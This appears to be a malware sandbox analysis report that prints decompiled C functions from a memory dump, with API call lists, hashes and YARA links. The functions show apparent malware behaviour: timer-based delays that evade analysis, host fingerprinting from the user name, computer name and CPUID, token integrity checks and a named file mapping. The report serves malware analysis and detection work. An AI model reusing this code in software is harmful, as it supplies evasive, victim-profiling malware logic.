                                                          			E04C051B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4c0d240);
					_v20 = 0;
					_v16 = 0;
					L04C0AF2E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x4c0d26c; // 0x31c
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4c0d24c = 5;
						} else {
							_t68 = E04C08D14(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x4c0d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E04C0A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E04C036B1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4c0d244);
							goto L21;
						} else {
							__eflags =  *0x4c0d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04C06761();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4c0d248);
								L21:
								L04C0AF2E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x4c0d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                          0x04c051b0
                                                          0x04c051c2
                                                          0x04c051c5
                                                          0x04c051d1
                                                          0x04c051d7
                                                          0x04c051dc
                                                          0x04c05343
                                                          0x04c051e2
                                                          0x04c051e2
                                                          0x04c051e4
                                                          0x04c051e9
                                                          0x04c051ea
                                                          0x04c051f0
                                                          0x04c051f3
                                                          0x04c051f6
                                                          0x04c05204
                                                          0x04c0520f
                                                          0x04c05212
                                                          0x04c05214
                                                          0x04c05221
                                                          0x04c0522b
                                                          0x04c0522d
                                                          0x04c05232
                                                          0x04c05237
                                                          0x04c05242
                                                          0x04c05242
                                                          0x04c05239
                                                          0x04c05239
                                                          0x04c05240
                                                          0x00000000
                                                          0x00000000
                                                          0x04c05240
                                                          0x04c0524c
                                                          0x00000000
                                                          0x04c0524f
                                                          0x04c05253
                                                          0x04c0525e
                                                          0x04c0525e
                                                          0x04c05265
                                                          0x04c0526e
                                                          0x04c05275
                                                          0x04c0527e
                                                          0x04c05281
                                                          0x04c05284
                                                          0x04c05289
                                                          0x04c0528e
                                                          0x00000000
                                                          0x00000000
                                                          0x04c05290
                                                          0x04c05293
                                                          0x04c05296
                                                          0x04c05299
                                                          0x00000000
                                                          0x04c0529b
                                                          0x04c052aa
                                                          0x04c052aa
                                                          0x00000000
                                                          0x04c052d8
                                                          0x04c052d8
                                                          0x04c052dd
                                                          0x04c052fc
                                                          0x04c052fe
                                                          0x04c05303
                                                          0x04c05304
                                                          0x00000000
                                                          0x04c052df
                                                          0x04c052df
                                                          0x04c052e5
                                                          0x00000000
                                                          0x04c052e7
                                                          0x04c052e7
                                                          0x04c052ec
                                                          0x04c052ee
                                                          0x04c052f3
                                                          0x04c052f4
                                                          0x04c0530a
                                                          0x04c0530a
                                                          0x04c05312
                                                          0x04c0531d
                                                          0x04c05320
                                                          0x04c0532b
                                                          0x04c0532d
                                                          0x04c05330
                                                          0x04c05332
                                                          0x00000000
                                                          0x04c05338
                                                          0x00000000
                                                          0x04c05338
                                                          0x04c05332
                                                          0x04c052e5
                                                          0x00000000
                                                          0x04c052dd
                                                          0x04c052ad
                                                          0x04c052af
                                                          0x04c052b2
                                                          0x04c052b3
                                                          0x04c052b3
                                                          0x04c052b7
                                                          0x04c052c1
                                                          0x04c052c1
                                                          0x04c052c7
                                                          0x04c052ca
                                                          0x04c052ca
                                                          0x04c052d0
                                                          0x04c052d0
                                                          0x04c0534d
                                                          0x00000000

                                                          APIs
                                                          • memset.NTDLL ref: 04C051C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04C051D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04C051F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04C05212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04C0522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C052C1
                                                          • CloseHandle.KERNEL32(?), ref: 04C052D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04C0530A
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04C05D5E,?), ref: 04C05320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04C0532B
                                                            • Part of subcall function 04C08D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,068893A0,?,00000000,30314549,00000014,004F0053,0688935C), ref: 04C08E00
                                                            • Part of subcall function 04C08D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04C0523E), ref: 04C08E12
                                                          • GetLastError.KERNEL32 ref: 04C0533D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: caf133e4c2299030557cec8b441697818c5c228a7b530c42daad7e5bebdaecf8
                                                          • Instruction ID: 33d65d8911929edfa86845aeac4393dcb44eb36e600a342fb89b639753ff22ba
                                                          • Opcode Fuzzy Hash: caf133e4c2299030557cec8b441697818c5c228a7b530c42daad7e5bebdaecf8
                                                          • Instruction Fuzzy Hash: B6514EB5901228BBDF11DFD5DC44AEEBFBAEF49724F208615F411A2190D774AA80DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C0232F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E04C0232F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04C0AF28();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4c0d2a8; // 0x1c7a5a8
				_t5 = _t13 + 0x4c0e87e; // 0x6888e26
				_t6 = _t13 + 0x4c0e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04C0ABCA();
				_t17 = CreateFileMappingW(0xffffffff, 0x4c0d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                          0x04c0232f
                                                          0x04c02337
                                                          0x04c0233b
                                                          0x04c02341
                                                          0x04c02346
                                                          0x04c0234b
                                                          0x04c0234e
                                                          0x04c02351
                                                          0x04c02356
                                                          0x04c02357
                                                          0x04c0235a
                                                          0x04c0235f
                                                          0x04c02366
                                                          0x04c02370
                                                          0x04c02372
                                                          0x04c02373
                                                          0x04c02376
                                                          0x04c02392
                                                          0x04c02398
                                                          0x04c0239c
                                                          0x04c023ea
                                                          0x04c0239e
                                                          0x04c023ab
                                                          0x04c023bb
                                                          0x04c023c3
                                                          0x04c023d5
                                                          0x04c023d9
                                                          0x00000000
                                                          0x00000000
                                                          0x04c023c5
                                                          0x04c023c8
                                                          0x04c023cd
                                                          0x04c023cf
                                                          0x04c023cf
                                                          0x04c023ad
                                                          0x04c023af
                                                          0x04c023db
                                                          0x04c023dc
                                                          0x04c023dc
                                                          0x04c023ab
                                                          0x04c023f1

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04C05C31,?,?,4D283A53,?,?), ref: 04C0233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04C02351
                                                          • _snwprintf.NTDLL ref: 04C02376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,04C0D2AC,00000004,00000000,00001000,?), ref: 04C02392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04C05C31,?,?,4D283A53), ref: 04C023A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04C023BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04C05C31,?,?), ref: 04C023DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04C05C31,?,?,4D283A53), ref: 04C023E4
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 47b3b4e0891293233657c352919174f56b8726572e09da6bf0fe1960622b5981
                                                          • Instruction ID: 05e13cfb203c1e3eb0b96abae10807e6ad56206643fb57fdb5ffec640435af2f
                                                          • Opcode Fuzzy Hash: 47b3b4e0891293233657c352919174f56b8726572e09da6bf0fe1960622b5981
                                                          • Instruction Fuzzy Hash: 81210276640204BBDB11ABA8DC09F9E77AEEB48704F168261F605E71C0E670EE44CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C09135, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E04C09135(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4c0d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04C0A6CC( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4c0d2a4 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4c0d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04C07306(_v8 + _v8, _t64);
							}
							HeapFree( *0x4c0d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4c0d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04C07306(_v8 + _v8, _t64);
						}
						HeapFree( *0x4c0d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                          0x04c09135
                                                          0x04c0913d
                                                          0x04c09141
                                                          0x04c09144
                                                          0x04c09149
                                                          0x04c0914b
                                                          0x04c09150
                                                          0x04c09150
                                                          0x04c09156
                                                          0x04c09158
                                                          0x04c09165
                                                          0x04c091c6
                                                          0x04c09167
                                                          0x04c0916c
                                                          0x04c09172
                                                          0x04c09177
                                                          0x04c09185
                                                          0x04c09189
                                                          0x04c09198
                                                          0x04c0919f
                                                          0x04c091a6
                                                          0x04c091a6
                                                          0x04c091b1
                                                          0x04c091b1
                                                          0x04c09189
                                                          0x04c09177
                                                          0x04c091c8
                                                          0x04c091ce
                                                          0x04c091d8
                                                          0x04c091da
                                                          0x04c091df
                                                          0x04c091ee
                                                          0x04c091f2
                                                          0x04c091fd
                                                          0x04c09204
                                                          0x04c0920b
                                                          0x04c0920b
                                                          0x04c09217
                                                          0x04c09217
                                                          0x04c091f2
                                                          0x04c09222
                                                          0x04c09224
                                                          0x04c09227
                                                          0x04c09229
                                                          0x04c0922c
                                                          0x04c0922f
                                                          0x04c09239
                                                          0x04c0923d
                                                          0x04c09241

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04C0916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04C09183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04C09190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04C05D20), ref: 04C091B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04C091D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04C091EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04C091F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04C05D20), ref: 04C09217
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: ce598865ed0e927223eb2de877135ed8c76f07b8338b6d80ffd91b380bae59e5
                                                          • Instruction ID: 4183421d9de9672e9cf0db4682369566ad73b916ed641f9462bb65666c0bc4c3
                                                          • Opcode Fuzzy Hash: ce598865ed0e927223eb2de877135ed8c76f07b8338b6d80ffd91b380bae59e5
                                                          • Instruction Fuzzy Hash: C0313AB6A00205EFEB10DFA9DC85BAEB7FAEF44304F128469E505D7291D734EE419B10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C01A08, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04C01A08(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4c0d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04C0A71F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04C0A734(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                          0x04c01a15
                                                          0x04c01a1c
                                                          0x04c01a23
                                                          0x04c01a37
                                                          0x04c01a42
                                                          0x04c01a5a
                                                          0x04c01a67
                                                          0x04c01a6a
                                                          0x04c01a6f
                                                          0x04c01a7a
                                                          0x04c01a7e
                                                          0x04c01a8d
                                                          0x04c01a91
                                                          0x04c01aad
                                                          0x04c01aad
                                                          0x04c01ab1
                                                          0x04c01ab1
                                                          0x04c01ab6
                                                          0x04c01aba
                                                          0x04c01ac0
                                                          0x04c01ac1
                                                          0x04c01ac8
                                                          0x04c01ace

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04C01A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04C01A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04C01A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 04C01ABA
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04C01A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04C01A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04C01AA5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: dcd7432b5eb6ecc8583d5ec75f862386d897be3c8fdd8a560413ea4c63558756
                                                          • Instruction ID: c071edcde42d1d53a71627917a0370d8a8a9f4e29b6f0db7b8a4ce4f32a386e0
                                                          • Opcode Fuzzy Hash: dcd7432b5eb6ecc8583d5ec75f862386d897be3c8fdd8a560413ea4c63558756
                                                          • Instruction Fuzzy Hash: 48215C79900248FFEB00DF94DC84EAEBBBAEB44304F0481A6E901A6191C7759F45EF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C012E5, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E04C012E5(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4c0d238 = _t10;
				if(_t10 != 0) {
					 *0x4c0d1a8 = GetTickCount();
					_t12 = E04C03E69(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L04C0B08A();
							_t33 = _t14 + _t16;
							_t18 = E04C05548(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E04C04DA2(_t25) != 0) {
							 *0x4c0d260 = 1; // executed
						}
						_t12 = E04C05BA2(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                          0x04c012e5
                                                          0x04c012eb
                                                          0x04c012ec
                                                          0x04c012f8
                                                          0x04c012fe
                                                          0x04c01305
                                                          0x04c01315
                                                          0x04c0131a
                                                          0x04c01321
                                                          0x04c01323
                                                          0x04c01328
                                                          0x04c0132e
                                                          0x04c01334
                                                          0x04c0133e
                                                          0x04c01342
                                                          0x04c01344
                                                          0x04c01349
                                                          0x04c0134a
                                                          0x04c0134b
                                                          0x04c01350
                                                          0x04c01356
                                                          0x04c0135f
                                                          0x04c01360
                                                          0x04c01365
                                                          0x04c0136b
                                                          0x04c01377
                                                          0x04c01379
                                                          0x04c01379
                                                          0x04c01383
                                                          0x04c01383
                                                          0x04c01307
                                                          0x04c01309
                                                          0x04c01309
                                                          0x04c0138d

                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04C04EF2,?), ref: 04C012F8
                                                          • GetTickCount.KERNEL32 ref: 04C0130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04C04EF2,?), ref: 04C01328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04C04EF2,?), ref: 04C0132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04C0134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04C04EF2,?), ref: 04C01365
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 0d0582d6b498fecaf15d5c07ccbce60d4ead5a0c8753f2a8e92d0a9e3209614e
                                                          • Instruction ID: f40082ccb4ada4c4b14d37fa052ec940093895b7baf70182ff248578f00608a7
                                                          • Opcode Fuzzy Hash: 0d0582d6b498fecaf15d5c07ccbce60d4ead5a0c8753f2a8e92d0a9e3209614e
                                                          • Instruction Fuzzy Hash: 8411087AA44300BFF314ABA4DC09B6A7B9AEB44758F058615FA85C62C0EE74FD40D660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C05BA2, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 57%
                                                          			E04C05BA2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04C06C09();
				if(_t21 != 0) {
					_t59 =  *0x4c0d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x4c0d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4c0d160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04C0496B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x4c0d2a8; // 0x1c7a5a8
					if( *0x4c0d25c > 5) {
						_t8 = _t26 + 0x4c0e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4c0e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E04C0729A(_t27, _t27);
					_t31 = E04C0232F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x4c0d270 =  *0x4c0d270 ^ 0x81bbe65d;
						_t32 = E04C0A71F(0x60);
						 *0x4c0d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x4c0d32c; // 0x68895b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x4c0d32c; // 0x68895b0
							 *_t51 = 0x4c0e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x4c0d238, 0, 0x43);
							 *0x4c0d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x4c0d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x4c0d2a8; // 0x1c7a5a8
								_t13 = _t58 + 0x4c0e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4c0c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04C09135( ~_v8 &  *0x4c0d270,  &E04C0D00C); // executed
								_t54 = E04C0888E(_t55);
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04C087AE(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04C051B0(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04C01C66(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4c0d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E04C0A273(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}






























                                                          0x04c05ba2
                                                          0x04c05bad
                                                          0x04c05bb0
                                                          0x04c05bb3
                                                          0x04c05bb6
                                                          0x04c05bbd
                                                          0x04c05bbf
                                                          0x04c05bcb
                                                          0x04c05bcd
                                                          0x04c05bcd
                                                          0x04c05bd6
                                                          0x04c05bdc
                                                          0x04c05be1
                                                          0x04c05bfb
                                                          0x04c05c07
